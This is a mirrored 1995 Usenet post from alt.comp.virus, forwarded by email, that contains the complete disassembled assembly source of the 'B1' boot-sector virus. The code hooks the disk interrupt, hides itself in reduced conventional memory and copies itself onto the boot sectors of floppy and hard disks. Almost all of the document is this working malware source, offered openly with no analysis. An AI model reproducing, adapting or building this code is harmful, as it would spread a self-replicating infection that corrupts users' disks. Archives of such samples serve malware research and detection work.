mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
363 lines
11 KiB
NASM
363 lines
11 KiB
NASM
|
From smtp Tue Feb 7 13:16 EST 1995
|
|||
|
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:16 EST
|
|||
|
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
|
|||
|
id NAA01723 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:19:13 -0500
|
|||
|
Date: Tue, 7 Feb 1995 13:19:13 -0500
|
|||
|
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
|
|||
|
Content-Length: 10347
|
|||
|
Content-Type: binary
|
|||
|
Message-Id: <199502071819.NAA01723@lynx.dac.neu.edu>
|
|||
|
To: pobox.jwu.edu!joshuaw
|
|||
|
Subject: (fwd) B1
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Status: O
|
|||
|
|
|||
|
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
|
|||
|
From: danishm@iia.org ()
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Subject: B1
|
|||
|
Date: 5 Feb 1995 22:05:37 GMT
|
|||
|
Organization: International Internet Association.
|
|||
|
Lines: 330
|
|||
|
Message-ID: <3h3i3h$v4@ankh.iia.org>
|
|||
|
NNTP-Posting-Host: iia.org
|
|||
|
X-Newsreader: TIN [version 1.2 PL2]
|
|||
|
|
|||
|
Here is the B1 virus:
|
|||
|
|
|||
|
|
|||
|
PAGE 59,132
|
|||
|
; Disassembled using sourcer
|
|||
|
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
|
|||
|
;[[ [[
|
|||
|
;[[ B1 [[
|
|||
|
;[[ [[
|
|||
|
;[[ Created: 8-Jan-95 [[
|
|||
|
;[[ Version: [[
|
|||
|
;[[ Code type: zero start [[
|
|||
|
;[[ Passes: 5 Analysis Options on: none [[
|
|||
|
;[[ [[
|
|||
|
;[[ [[
|
|||
|
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
|
|||
|
|
|||
|
data_1e equ 413h ; (0000:0413=7Fh)
|
|||
|
data_2e equ 46Dh ; (0000:046D=17E1h)
|
|||
|
data_3e equ 4Ch ; (0006:004C=0DAh)
|
|||
|
|
|||
|
seg_a segment byte public
|
|||
|
assume cs:seg_a, ds:seg_a
|
|||
|
|
|||
|
|
|||
|
org 0
|
|||
|
|
|||
|
virus proc far
|
|||
|
|
|||
|
start:
|
|||
|
jmp short loc_2 ; (0040)
|
|||
|
db 90h, 00h, 4Dh, 4Dh, 49h, 00h
|
|||
|
db 33h, 2Eh, 33h, 00h, 02h, 01h
|
|||
|
db 01h, 00h, 02h,0E0h, 00h, 40h
|
|||
|
db 0Bh,0F0h, 09h, 00h, 12h, 00h
|
|||
|
db 02h, 00h
|
|||
|
db 19 dup (0)
|
|||
|
db 12h, 00h, 00h, 00h, 00h, 01h
|
|||
|
db 00h,0FAh, 33h,0C0h, 8Eh,0D0h
|
|||
|
db 0BCh, 00h, 7Ch, 16h, 07h
|
|||
|
loc_2:
|
|||
|
push cs
|
|||
|
call sub_1 ; (00EF)
|
|||
|
push ax
|
|||
|
shr ax,1 ; Shift w/zeros fill
|
|||
|
dec ah
|
|||
|
jz loc_3 ; Jump if zero
|
|||
|
jmp loc_14 ; (01BA)
|
|||
|
loc_3:
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push es
|
|||
|
push si
|
|||
|
push di
|
|||
|
push ds
|
|||
|
push bp
|
|||
|
mov bp,sp
|
|||
|
or ch,ch ; Zero ?
|
|||
|
jnz loc_5 ; Jump if not zero
|
|||
|
shl al,1 ; Shift w/zeros fill
|
|||
|
jc loc_4 ; Jump if carry Set
|
|||
|
call sub_6 ; (0190)
|
|||
|
call sub_4 ; (017B)
|
|||
|
jc loc_7 ; Jump if carry Set
|
|||
|
call sub_2 ; (0127)
|
|||
|
jz loc_4 ; Jump if zero
|
|||
|
call sub_6 ; (0190)
|
|||
|
call sub_3 ; (013B)
|
|||
|
jz loc_5 ; Jump if zero
|
|||
|
inc ah
|
|||
|
call sub_4 ; (017B)
|
|||
|
jc loc_5 ; Jump if carry Set
|
|||
|
call sub_5 ; (0182)
|
|||
|
call sub_6 ; (0190)
|
|||
|
inc ah
|
|||
|
call sub_4 ; (017B)
|
|||
|
loc_4:
|
|||
|
call sub_7 ; (019E)
|
|||
|
or ch,dh
|
|||
|
dec cx
|
|||
|
jnz loc_5 ; Jump if not zero
|
|||
|
call sub_6 ; (0190)
|
|||
|
call sub_4 ; (017B)
|
|||
|
jc loc_7 ; Jump if carry Set
|
|||
|
call sub_2 ; (0127)
|
|||
|
jnz loc_5 ; Jump if not zero
|
|||
|
call sub_7 ; (019E)
|
|||
|
call sub_3 ; (013B)
|
|||
|
dec byte ptr [bp+10h]
|
|||
|
jz loc_6 ; Jump if zero
|
|||
|
mov al,1
|
|||
|
call sub_4 ; (017B)
|
|||
|
jc loc_7 ; Jump if carry Set
|
|||
|
call sub_7 ; (019E)
|
|||
|
add bx,di
|
|||
|
inc cl
|
|||
|
jmp short loc_6 ; (00BA)
|
|||
|
loc_5:
|
|||
|
call sub_7 ; (019E)
|
|||
|
loc_6:
|
|||
|
call sub_4 ; (017B)
|
|||
|
loc_7:
|
|||
|
pushf ; Push flags
|
|||
|
pop bx
|
|||
|
mov [bp+16h],bx
|
|||
|
xchg ax,[bp+10h]
|
|||
|
shr ah,1 ; Shift w/zeros fill
|
|||
|
jnc loc_9 ; Jump if carry=0
|
|||
|
xor ax,ax ; Zero register
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:data_2e ; (0000:046D=17E1h)
|
|||
|
and ax,178Fh
|
|||
|
jnz loc_9 ; Jump if not zero
|
|||
|
call sub_6 ; (0190)
|
|||
|
loc_8:
|
|||
|
push ax
|
|||
|
call sub_4 ; (017B)
|
|||
|
xor cx,0FFC0h
|
|||
|
nop ;*ASM fixup - sign extn byte
|
|||
|
shl ax,1 ; Shift w/zeros fill
|
|||
|
pop ax
|
|||
|
jnc loc_8 ; Jump if carry=0
|
|||
|
loc_9:
|
|||
|
pop bp
|
|||
|
pop ds
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop es
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
iret ; Interrupt return
|
|||
|
|
|||
|
virus endp
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_1 proc near
|
|||
|
mov bx,44h
|
|||
|
mov dx,80h
|
|||
|
mov si,data_1e ; (0000:0413=7Fh)
|
|||
|
xor di,di ; Zero register
|
|||
|
mov ds,di
|
|||
|
dec word ptr [si]
|
|||
|
lodsw ; String [si] to ax
|
|||
|
pop si
|
|||
|
mov cl,6
|
|||
|
shl ax,cl ; Shift w/zeros fill
|
|||
|
mov es,ax
|
|||
|
sub si,bx
|
|||
|
push si
|
|||
|
push ax
|
|||
|
mov ax,1AEh
|
|||
|
push ax
|
|||
|
push cs
|
|||
|
push si
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
call sub_5 ; (0182)
|
|||
|
mov ds,cx
|
|||
|
mov si,data_3e ; (0006:004C=0DAh)
|
|||
|
mov cl,2
|
|||
|
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
mov [si-4],bx
|
|||
|
mov [si-2],es
|
|||
|
pop bx
|
|||
|
pop es
|
|||
|
retf ; Return far
|
|||
|
sub_1 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_2 proc near
|
|||
|
cld ; Clear direction
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
xor si,si ; Zero register
|
|||
|
mov di,bx
|
|||
|
mov cl,40h ; '@'
|
|||
|
push si
|
|||
|
push di
|
|||
|
add si,cx
|
|||
|
add di,cx
|
|||
|
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
retn
|
|||
|
sub_2 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_3 proc near
|
|||
|
push ax
|
|||
|
xor dh,dh ; Zero register
|
|||
|
test dl,80h
|
|||
|
jz loc_10 ; Jump if zero
|
|||
|
mov cx,11h
|
|||
|
jmp short loc_11 ; (0175)
|
|||
|
loc_10:
|
|||
|
mov ax,[di+11h]
|
|||
|
mov cl,4
|
|||
|
shr ax,cl ; Shift w/zeros fill
|
|||
|
mov cx,ax
|
|||
|
mov ax,[di+16h]
|
|||
|
shl ax,1 ; Shift w/zeros fill
|
|||
|
jc loc_12 ; Jump if carry Set
|
|||
|
add ax,cx
|
|||
|
jc loc_12 ; Jump if carry Set
|
|||
|
xor cx,cx ; Zero register
|
|||
|
cmp ah,[di+18h]
|
|||
|
jae loc_12 ; Jump if above or =
|
|||
|
div byte ptr [di+18h] ; al,ah rem = ax/data
|
|||
|
xchg cl,ah
|
|||
|
cmp ah,[di+1Ah]
|
|||
|
jae loc_12 ; Jump if above or =
|
|||
|
div byte ptr [di+1Ah] ; al,ah rem = ax/data
|
|||
|
mov ch,al
|
|||
|
mov dh,ah
|
|||
|
inc cx
|
|||
|
loc_11:
|
|||
|
pop ax
|
|||
|
retn
|
|||
|
loc_12:
|
|||
|
xor cx,cx ; Zero register
|
|||
|
jmp short loc_11 ; (0175)
|
|||
|
sub_3 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_4 proc near
|
|||
|
pushf ; Push flags
|
|||
|
call dword ptr cs:[1BCh] ; (7379:01BC=0D79h)
|
|||
|
retn
|
|||
|
sub_4 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_5 proc near
|
|||
|
cld ; Clear direction
|
|||
|
movsw ; Mov [si] to es:[di]
|
|||
|
mov cx,17Ch
|
|||
|
add si,3Eh
|
|||
|
add di,3Eh
|
|||
|
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
retn
|
|||
|
sub_5 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_6 proc near
|
|||
|
push cs
|
|||
|
mov ax,200h
|
|||
|
mov bx,ax
|
|||
|
xor cx,cx ; Zero register
|
|||
|
xor dh,dh ; Zero register
|
|||
|
inc cx
|
|||
|
inc ax
|
|||
|
pop es
|
|||
|
retn
|
|||
|
sub_6 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
sub_7 proc near
|
|||
|
mov ax,[bp+10h]
|
|||
|
mov bx,[bp+0Eh]
|
|||
|
mov cx,[bp+0Ch]
|
|||
|
mov dx,[bp+0Ah]
|
|||
|
mov es,[bp+8]
|
|||
|
retn
|
|||
|
sub_7 endp
|
|||
|
|
|||
|
db 41h ; Inc cx ?
|
|||
|
loc_13:
|
|||
|
mov ax,201h
|
|||
|
int 13h ; Disk dl=drive a ah=func 02h
|
|||
|
; read sectors to memory es:bx
|
|||
|
xor dl,80h
|
|||
|
jz loc_13 ; Jump if zero
|
|||
|
retf ; Return far
|
|||
|
loc_14:
|
|||
|
pop ax
|
|||
|
;* jmp far ptr loc_1 ;*(000A:0D79)
|
|||
|
db 0EAh, 79h, 0Dh, 0Ah, 00h
|
|||
|
db 0Dh, 0Ah, 'Disk Boot failure', 0Dh
|
|||
|
db 0Ah, 0
|
|||
|
db 'IBMBIO COMIBMDOS COM'
|
|||
|
db 18 dup (0)
|
|||
|
db 55h,0AAh
|
|||
|
|
|||
|
seg_a ends
|
|||
|
|
|||
|
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
ls virus.asm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ls virus.asm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--
|
|||
|
Eric "Mad Dog" Kilby maddog@ccs.neu.edu
|
|||
|
The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu
|
|||
|
Student at the Northeatstern University College of Computer Science
|
|||
|
"I Can't Believe It's Not Butter"
|
|||
|
|